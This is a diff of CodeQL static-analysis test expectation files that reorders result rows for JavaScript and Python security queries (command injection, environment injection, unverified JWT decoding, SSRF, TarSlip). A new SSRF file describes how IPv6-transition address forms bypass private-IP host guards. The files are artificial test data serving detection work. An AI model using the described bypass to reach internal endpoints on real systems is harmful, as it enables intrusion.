| test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | -| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | -| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | edges | test.js:5:11:5:17 | payload | test.js:6:30:6:36 | payload | provenance | | | test.js:5:11:5:17 | payload | test.js:9:26:9:32 | payload | provenance | | @@ -38,3 +33,8 @@ nodes | test.js:19:18:19:24 | payload | semmle.label | payload | | test.js:19:18:19:30 | payload + sth | semmle.label | payload + sth | subpaths +#select +| test.js:7:16:7:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:7:16:7:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:10:16:10:25 | payloadURL | test.js:5:21:5:44 | req.que ... rameter | test.js:10:16:10:25 | payloadURL | This command line depends on a $@. | test.js:5:21:5:44 | req.que ... rameter | user-provided value | +| test.js:18:18:18:24 | payload | test.js:17:21:17:44 | req.que ... rameter | test.js:18:18:18:24 | payload | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | +| test.js:19:18:19:30 | payload + sth | test.js:17:21:17:44 | req.que ... rameter | test.js:19:18:19:30 | payload + sth | This command line depends on a $@. | test.js:17:21:17:44 | req.que ... rameter | user-provided value | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected index bbf737831d6d..d54685c97bef 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueAndKeyInjection/EnvValueAndKeyInjection.expected @@ -1,6 +1,3 @@ -#select -| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | -| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | edges | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:11:5:18 | EnvValue | provenance | | | test.js:5:9:5:28 | { EnvValue, EnvKey } | test.js:5:21:5:26 | EnvKey | provenance | | @@ -30,3 +27,6 @@ nodes | test.js:15:15:15:20 | EnvKey | semmle.label | EnvKey | | test.js:16:26:16:33 | EnvValue | semmle.label | EnvValue | subpaths +#select +| test.js:6:15:6:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:6:15:6:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | +| test.js:7:15:7:20 | EnvKey | test.js:5:32:5:39 | req.body | test.js:7:15:7:20 | EnvKey | arbitrary environment variable assignment from this $@. | test.js:5:32:5:39 | req.body | user controllable source | diff --git a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected index ae8779ded9e7..5ba1884017f6 100644 --- a/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected +++ b/javascript/ql/test/experimental/Security/CWE-099/EnvValueInjection/EnvValueInjection.expected @@ -1,7 +1,3 @@ -#select -| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | -| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | edges | test.js:4:9:4:20 | { EnvValue } | test.js:4:11:4:18 | EnvValue | provenance | | | test.js:4:11:4:18 | EnvValue | test.js:5:35:5:42 | EnvValue | provenance | | @@ -16,3 +12,7 @@ nodes | test.js:6:23:6:30 | EnvValue | semmle.label | EnvValue | | test.js:7:22:7:29 | EnvValue | semmle.label | EnvValue | subpaths +#select +| test.js:5:35:5:42 | EnvValue | test.js:4:24:4:31 | req.body | test.js:5:35:5:42 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:6:23:6:30 | EnvValue | test.js:4:24:4:31 | req.body | test.js:6:23:6:30 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | +| test.js:7:22:7:29 | EnvValue | test.js:4:24:4:31 | req.body | test.js:7:22:7:29 | EnvValue | this environment variable assignment is $@. | test.js:4:24:4:31 | req.body | user controllable | diff --git a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected index ba75c463f9be..09db119d0786 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected +++ b/javascript/ql/test/experimental/Security/CWE-347/localsource/decodeJwtWithoutVerificationLocalSource.expected @@ -1,10 +1,3 @@ -#select -| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | -| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | -| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | -| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | -| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | edges | JsonWebToken.js:13:11:13:19 | UserToken | JsonWebToken.js:16:28:16:36 | UserToken | provenance | | | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:11:13:19 | UserToken | provenance | | @@ -80,3 +73,10 @@ nodes | jwtSimple.js:31:23:31:31 | UserToken | semmle.label | UserToken | | jwtSimple.js:32:23:32:31 | UserToken | semmle.label | UserToken | subpaths +#select +| JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:13:23:13:28 | aJwt() | JsonWebToken.js:16:28:16:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:16:28:16:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:23:28:23:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:23:28:23:36 | UserToken | without signature verification | +| JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:20:23:20:28 | aJwt() | JsonWebToken.js:24:28:24:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:24:28:24:36 | UserToken | without signature verification | +| jose.js:12:23:12:28 | aJwt() | jose.js:12:23:12:28 | aJwt() | jose.js:15:20:15:28 | UserToken | Decoding JWT $@. | jose.js:15:20:15:28 | UserToken | without signature verification | +| jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:13:23:13:28 | aJwt() | jwtDecode.js:17:16:17:24 | UserToken | Decoding JWT $@. | jwtDecode.js:17:16:17:24 | UserToken | without signature verification | +| jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:13:23:13:28 | aJwt() | jwtSimple.js:16:23:16:31 | UserToken | Decoding JWT $@. | jwtSimple.js:16:23:16:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected index 54fa92b1b136..364fbd76b002 100644 --- a/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected +++ b/javascript/ql/test/experimental/Security/CWE-347/remotesource/decodeJwtWithoutVerification.expected @@ -1,10 +1,3 @@ -#select -| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | -| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | -| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | -| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | -| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | edges | JsonWebToken.js:10:11:10:19 | UserToken | JsonWebToken.js:13:28:13:36 | UserToken | provenance | | | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:11:10:19 | UserToken | provenance | | @@ -55,3 +48,10 @@ nodes | jwtSimple.js:25:23:25:47 | req.hea ... ization | semmle.label | req.hea ... ization | | jwtSimple.js:28:23:28:31 | UserToken | semmle.label | UserToken | subpaths +#select +| JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:10:23:10:47 | req.hea ... ization | JsonWebToken.js:13:28:13:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:13:28:13:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:20:28:20:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:20:28:20:36 | UserToken | without signature verification | +| JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:17:23:17:47 | req.hea ... ization | JsonWebToken.js:21:28:21:36 | UserToken | Decoding JWT $@. | JsonWebToken.js:21:28:21:36 | UserToken | without signature verification | +| jose.js:11:23:11:47 | req.hea ... ization | jose.js:11:23:11:47 | req.hea ... ization | jose.js:13:20:13:28 | UserToken | Decoding JWT $@. | jose.js:13:20:13:28 | UserToken | without signature verification | +| jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:11:23:11:47 | req.hea ... ization | jwtDecode.js:15:16:15:24 | UserToken | Decoding JWT $@. | jwtDecode.js:15:16:15:24 | UserToken | without signature verification | +| jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:10:23:10:47 | req.hea ... ization | jwtSimple.js:13:23:13:31 | UserToken | Decoding JWT $@. | jwtSimple.js:13:23:13:31 | UserToken | without signature verification | diff --git a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected index 0c79678c683f..8a0dabd4c59e 100644 --- a/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected +++ b/javascript/ql/test/experimental/Security/CWE-918/SSRF.expected @@ -1,24 +1,3 @@ -#select -| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | -| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | -| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | -| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | -| check-regex.js:16:15:16:45 | "test.c ... tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:24:15:24:42 | baseURL ... tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:59:15:59:45 | "test.c ... tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | -| check-validator.js:62:15:62:37 | "test.c ... mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | -| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | edges | check-domain.js:16:9:16:11 | url | check-domain.js:17:13:17:15 | url | provenance | | | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:16:9:16:11 | url | provenance | | @@ -86,3 +65,24 @@ nodes | check-validator.js:68:15:68:45 | "test.c ... tainted | semmle.label | "test.c ... tainted | | check-validator.js:68:29:68:45 | req.query.tainted | semmle.label | req.query.tainted | subpaths +#select +| check-domain.js:17:13:17:15 | url | check-domain.js:16:15:16:27 | req.query.url | check-domain.js:17:13:17:15 | url | The URL of this request depends on a user-provided value. | +| check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | check-domain.js:26:15:26:27 | req.query.url | The URL of this request depends on a user-provided value. | +| check-middleware.js:9:13:9:43 | "test.c ... tainted | check-middleware.js:9:27:9:43 | req.query.tainted | check-middleware.js:9:13:9:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:19:13:19:43 | 'test.c ... tainted | check-path.js:19:27:19:43 | req.query.tainted | check-path.js:19:13:19:43 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:23:13:23:45 | `/addre ... inted}` | check-path.js:23:27:23:43 | req.query.tainted | check-path.js:23:13:23:45 | `/addre ... inted}` | The URL of this request depends on a user-provided value. | +| check-path.js:33:15:33:45 | 'test.c ... tainted | check-path.js:33:29:33:45 | req.query.tainted | check-path.js:33:15:33:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:37:15:37:45 | 'test.c ... tainted | check-path.js:37:29:37:45 | req.query.tainted | check-path.js:37:15:37:45 | 'test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-path.js:45:13:45:44 | `${base ... inted}` | check-path.js:45:26:45:42 | req.query.tainted | check-path.js:45:13:45:44 | `${base ... inted}` | The URL of this request depends on a user-provided value. | +| check-regex.js:16:15:16:45 | "test.c ... tainted | check-regex.js:16:29:16:45 | req.query.tainted | check-regex.js:16:15:16:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:24:15:24:42 | baseURL ... tainted | check-regex.js:24:25:24:42 | req.params.tainted | check-regex.js:24:15:24:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:31:15:31:45 | "test.c ... tainted | check-regex.js:31:29:31:45 | req.query.tainted | check-regex.js:31:15:31:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:34:15:34:42 | baseURL ... tainted | check-regex.js:34:25:34:42 | req.params.tainted | check-regex.js:34:15:34:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:41:13:41:43 | "test.c ... tainted | check-regex.js:41:27:41:43 | req.query.tainted | check-regex.js:41:13:41:43 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-regex.js:61:15:61:42 | baseURL ... tainted | check-regex.js:61:25:61:42 | req.params.tainted | check-regex.js:61:15:61:42 | baseURL ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:15:15:15:45 | "test.c ... tainted | check-validator.js:15:29:15:45 | req.query.tainted | check-validator.js:15:15:15:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:27:15:27:45 | "test.c ... tainted | check-validator.js:27:29:27:45 | req.query.tainted | check-validator.js:27:15:27:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:50:15:50:45 | "test.c ... tainted | check-validator.js:50:29:50:45 | req.query.tainted | check-validator.js:50:15:50:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:59:15:59:45 | "test.c ... tainted | check-validator.js:59:29:59:45 | req.query.tainted | check-validator.js:59:15:59:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | +| check-validator.js:62:15:62:37 | "test.c ... mberURL | check-validator.js:54:21:54:37 | req.query.tainted | check-validator.js:62:15:62:37 | "test.c ... mberURL | The URL of this request depends on a user-provided value. | +| check-validator.js:68:15:68:45 | "test.c ... tainted | check-validator.js:68:29:68:45 | req.query.tainted | check-validator.js:68:15:68:45 | "test.c ... tainted | The URL of this request depends on a user-provided value. | diff --git a/javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected b/javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected new file mode 100644 index 000000000000..e488048f9afd --- /dev/null +++ b/javascript/ql/test/experimental/Security/CWE-918/SsrfIpv6TransitionIncompleteGuard/SsrfIpv6TransitionIncompleteGuard.expected @@ -0,0 +1,2 @@ +| bad-private-ip-pkg.js:6:1:11:1 | async f ... '/');\\n} | This SSRF host guard rejects private IPv4 ranges but never unwraps IPv6-transition forms (IPv4-mapped '::ffff:', NAT64 '64:ff9b::', 6to4 '2002::'); an attacker can wrap an internal IPv4 address in a transition literal to bypass it and reach internal endpoints. | +| bad-rfc1918-regex.js:5:1:16:1 | functio ... '/');\\n} | This SSRF host guard rejects private IPv4 ranges but never unwraps IPv6-transition forms (IPv4-mapped '::ffff:', NAT64 '64:ff9b::', 6to4 '2002::'); an attacker can wrap an internal IPv4 address in a transition literal to bypass it and reach internal endpoints. | diff --git a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected index 6cceacd031f6..6de2b27bfa76 100644 --- a/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected +++ b/python/ql/test/experimental/query-tests/Security/CWE-022-TarSlip/TarSlip.expected @@ -1,33 +1,3 @@ -#select -| TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:15:7:15:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:22:35:22:40 | ControlFlowNode for result | ControlFlowNode for result | -| TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:38:7:38:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:39:49:39:68 | ControlFlowNode for members_filter1() | ControlFlowNode for members_filter1() | -| TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:43:6:43:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:47:21:47:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:54:6:54:38 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:58:21:58:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:88:6:88:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:91:5:91:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:111:7:111:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:115:9:115:11 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:123:6:123:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:125:36:125:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:129:6:129:26 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:130:5:130:7 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:133:7:133:39 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:134:1:134:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:141:6:141:29 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:143:36:143:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:151:22:151:49 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:159:26:159:51 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:169:9:169:12 | ControlFlowNode for tarc | ControlFlowNode for tarc | -| TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:176:6:176:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:178:36:178:40 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:182:6:182:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:184:21:184:25 | ControlFlowNode for entry | ControlFlowNode for entry | -| TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:188:7:188:27 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:189:1:189:3 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:193:6:193:31 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:194:49:194:51 | ControlFlowNode for tar | ControlFlowNode for tar | -| TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | Extraction of tarfile from $@ to a potentially untrusted source $@. | TarSlipImprov.py:210:6:210:43 | ControlFlowNode for Attribute() | ControlFlowNode for Attribute() | TarSlipImprov.py:211:5:211:7 | ControlFlowNode for tar | 